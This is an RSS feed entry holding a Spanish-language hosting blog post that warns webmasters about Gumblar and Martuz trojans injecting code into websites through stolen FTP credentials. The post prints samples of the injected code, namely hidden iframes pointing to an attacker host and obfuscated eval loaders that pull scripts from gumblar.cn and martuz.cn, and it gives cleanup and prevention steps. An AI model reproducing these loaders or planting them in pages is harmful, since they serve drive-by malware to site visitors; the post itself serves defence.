<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Crear Página Web - Editor Web y Plantillas de Diseño &#187; troyano</title>
	<atom:link href="http://crear-pagina-web.com.es/crear-pagina-web/tag/troyano/feed/" rel="self" type="application/rss+xml" />
	<link>http://crear-pagina-web.com.es/crear-pagina-web</link>
	<description>Diseño web, editor web, plantillas web, editor tienda, editor blog, diseño páginas web, crear páginas web</description>
	<lastBuildDate>Tue, 20 Mar 2012 19:45:05 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.1.4</generator>
		<item>
		<title>SEGURIDAD &#8211; codigos maliciosos y ataques</title>
		<link>http://crear-pagina-web.com.es/crear-pagina-web/seguridad-codigos-maliciosos-ataques/</link>
		<comments>http://crear-pagina-web.com.es/crear-pagina-web/seguridad-codigos-maliciosos-ataques/#comments</comments>
		<pubDate>Mon, 08 Feb 2010 17:12:53 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Crear páginas web]]></category>
		<category><![CDATA[Diseño páginas web]]></category>
		<category><![CDATA[ataques]]></category>
		<category><![CDATA[blog]]></category>
		<category><![CDATA[clientes]]></category>
		<category><![CDATA[codigos maliciosos]]></category>
		<category><![CDATA[documentos]]></category>
		<category><![CDATA[galeria de fotos]]></category>
		<category><![CDATA[gusano]]></category>
		<category><![CDATA[hospedaje]]></category>
		<category><![CDATA[navegador]]></category>
		<category><![CDATA[plugins]]></category>
		<category><![CDATA[seguridad]]></category>
		<category><![CDATA[singular web]]></category>
		<category><![CDATA[sitio web]]></category>
		<category><![CDATA[troyano]]></category>
		<category><![CDATA[virus]]></category>

		<guid isPermaLink="false">http://blogwp.integral-isp.com/wordpress-mu/crear-pagina-web-com-es/?p=14</guid>
		<description><![CDATA[ [...]]]></description>
			<content:encoded><![CDATA[<h2>Inyección de código y ataques al sitio web.</h2>
<p style="text-align: justify"><img class="alignleft" src="http://img.singularweb.com/virus-pc.jpg" alt="" width="259" height="250" /><br />
En los últimos meses hemos detectado a través de llamadas y consultas de nuestros usuarios por un incremento notable de ataques de modificación o inyección de código por parte de virus en sitios web de Internet.</p>
<p style="text-align: justify">Esto motivó que envíasemos a todos nuestros usuarios una alerta por correo electrónico informando que se estában produciendo dichos ataques.<br />
Muchos webmasters de momento se dan cuenta que en los documentos de componen su sitio web aparecen líneas de código extrañas que muestran enlaces hacia sitios externos de forma invisible.</p>
<p>Realmente se trata de código que no ha sido introducido por el webmaster ni por su editor web sino que se trata de virus de tipo troyano que una vez que han infectado el PC del webmaster detectan buscan códigos ftp en el ordenador y los utiliza para inyectar el iframe en los documentos del sitio web.</p>
<p>Las páginas web que se ven afectados con más frecuencia son las del tipo index.php, index.htm, index.html, pero en ocasiones, en el caso de que el sitio web sea dinámico y esté basado en plantillas, tpls etc (blogs, wikis, cms) pueden verse afectados todos los archivos del sitio.</p>
<p>Estos virus aprovechan la vulnerabilidad existente en versiones antiguas de softare como Adobe Reader (muy utilizado para abrir pdfs) o Adobe Flash Player (software pare ejectuar películas de flash), aunque también puede producirse a través de otros programas.La forma más habitual de infección es la inyección de un iframe en el/los documentos html que componen el sitio.</p>
<p>Ejemplos de códigos maliciosos inyectados son:</p>
<address><span style="color: #808080">&lt;iframe src=”http://webdelatacante:8080/index.php” mce_src=”http://swebdelatacante:8080/index.php” width=107 height=152 style=”visibility: hidden”&gt;&lt;/iframe&gt;</span></address>
<p style="text-align: justify">O codigos más complejos como:</p>
<address><span style="color: #808080">(function(jil){var xR6p=’%&#8217;;eval(unescape((’var”20a”3d”22Sc”72iptEngin”65″22″2c”62″3d”22″56ers”68on()+”22″2c”6a”3d”22″22″2cu”3dnavig”61t”6 …………… “65rAgent”3bif((”75″2eind”65xOf”28″22Win”22)”3e0)”26″26(u”2e”69n”64exO”66(”22NT”20″36″22″29″3c0)”26″26(documen”74″2ecookie”2e”68ndex”4f”66″28″22″6die”6b”3d1″22)”3c0)”26″26″28t”79″70e”6ff3bdocu”6de”6e”74″2ewr”69″74e(”22″3csc”72ipt”20sr”63″3d”2f”2fgumblar”2ecn”2frss”2f”3fid”3d”22+j+”22″3e”3c”5c”2f”73cript”3e”22″29″3b”7d’).replace(jil,xR5p)))})(/”/g);</span></address>
<p style="text-align: justify">En la mayoría de los casos la función no tiene nombre, es anónima y de autollamada.Estas acciones son provocadas por troyanos del tipo Gumblar, Martuz o variantes de los mismos.</p>
<h3>¿Como debo proceder para prevenir y/o eliminar la infección?</h3>
<p style="text-align: justify">- Vacíe la caché de su navegador.</p>
<p>- Desactive la caché de su navegador.</p>
<p>- Desinstale los programas Adobe Acrobat Reader y Adobe Flash Player &#8211; Actualice su antivirus y haga un análisis completo de su ordenador</p>
<p>- Instale las últimas versiones de Adobe Acrobat Reader y Adobe Flash Player desde la web oficial de Adobe.</p>
<p>- Limpie el código malicioso, buscándolo en todas las páginas que conforman su sitio web y eliminando las líneas de código con aspecto similar a:</p>
<address><span style="color: #808080">(function(){var G33z1=’%&#8217;;var KlKj=’va-72-20a-3d-22-53c-72i-70t-45n-67-69ne-22-2cb-3d-22-56-65-72-73-69o-6e(-29+-22-2cj-3d-22-22-2c-75-3d-6eavigato-72-2eus-65-72-41-67ent-3bi-66-28-28u-2e-69ndexOf(-22Chrome-22-29-3c0-29-26-26(u-2e-69ndexOf(-22W-69n-22-29-3e0)-26-26-28u-2ein-64e-78Of(-22-4eT-206-22)-3c0)-26-26(d-6fcument-2ecookie-2e-69-6edex-4ff-28-22-6die-6b-3d1-22)-3c-30)-2626(type-6ff-28z-72vzts)-21-3dty-70e-6ff(-22A-22)-29)-7bz-72v-7ats-3d-22-41-22-3beval(-22if(window-2e-22-2b-61+-22)j-3dj+-22+a-2b-22Majo-72-22-2bb+a-2b-22Mi-6eo-72-22-2bb+a+-22-42uild-22+b+-22-6a-3b-22)-3bdoc-75m-65nt-2e-77rite(-22-3c-73-63ri-70-74-20src-3d-2f-2fm-61rtu-22+-22z-2ec-6e-2f-76id-2f-3fid-3d-22+j+-22-3e-3c-5c-2fs-63ri-70-74-3e-22)-3b-7d’;var m8nw=KlKj.replace(/-/g,G33z1);e val(unescape(m8nw))})();</span></address>
<address></address>
<p style="text-align: justify">_________________________________________________________________________________________<br />
<span style="color: #808080"><br />
</span></p>
<address><span style="color: #808080">&lt;iframe src=”http://webdelatacante:8080/index.php” mce_src=”http://webdelatacante:8080/index.php” width=107 height=152 style=”visibility: hidden”&gt;&lt;/iframe&gt; </span>__________________________________________________________________________________________</address>
<address><span style="color: #808080">var a=”ScriptEngine”,b=”Version()+”,j=”&#8221;,u=navigator.userAgent;</span></address>
<address><span style="color: #808080">if((u.indexOf(”Chrome”)&lt;0)&amp;&amp;(u.indexOf(”Win”)&gt;0)&amp;&amp;(u.indexOf(”NT 6″)&lt;0)&amp;&amp;(document.cookie.indexOf(”miek=1″)&lt;0)&amp;&amp;(typeof(zrvzssfs)!=typeof(”A”))){</span></address>
<address><span style="color: #808080">zrvzts=”A”;eval(”if(window.”+a+”)j=j+”+a+”Major”+b+a+”Minor”+b+a+”Build”+b+”j;”);</span></address>
<address><span style="color: #808080">document.w rite(”&lt;script src=//martu”+”z.cn/vid/?id=”+j+”&gt;&lt;\/script&gt;”);}</span></address>
<p style="text-align: justify">La búsqueda del código malicioso, si el sitio web está compuesto por una gran cantidad de documentos puede ser una labor muy tediosa, para hacerlo algo más cómodo puede buscar en todo el sitio web automáticamente con su editor web por cadenas de palabras, por ejemplo:</p>
<p>Buscar en todo el sitio las palabras</p>
<p><span style="color: #808080"><strong>Iframe</strong></span></p>
<p><span style="color: #808080"><strong>script src =” Martuz for-like</strong></span></p>
<p><span style="color: #808080"><strong>visibility: hidden</strong></span></p>
<p>Cuando encuentre esas líneas de código, fíjese en ellas y si no han sido introducidas por usted, elimínelas de su código fuente en todos aquellosdocumentos de su web en los que estén presentes.</p>
<p>Una vez limpiado el código de su sitio web, recuerde <strong>CAMBIAR LA CONTRASEÑA FTP</strong> y solicitar a cualquier otra persona que haya tenido acceso a su hosting mediante ftp (diseñador web, programador …) que realice las mismas acciones.</p>
]]></content:encoded>
			<wfw:commentRss>http://crear-pagina-web.com.es/crear-pagina-web/seguridad-codigos-maliciosos-ataques/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

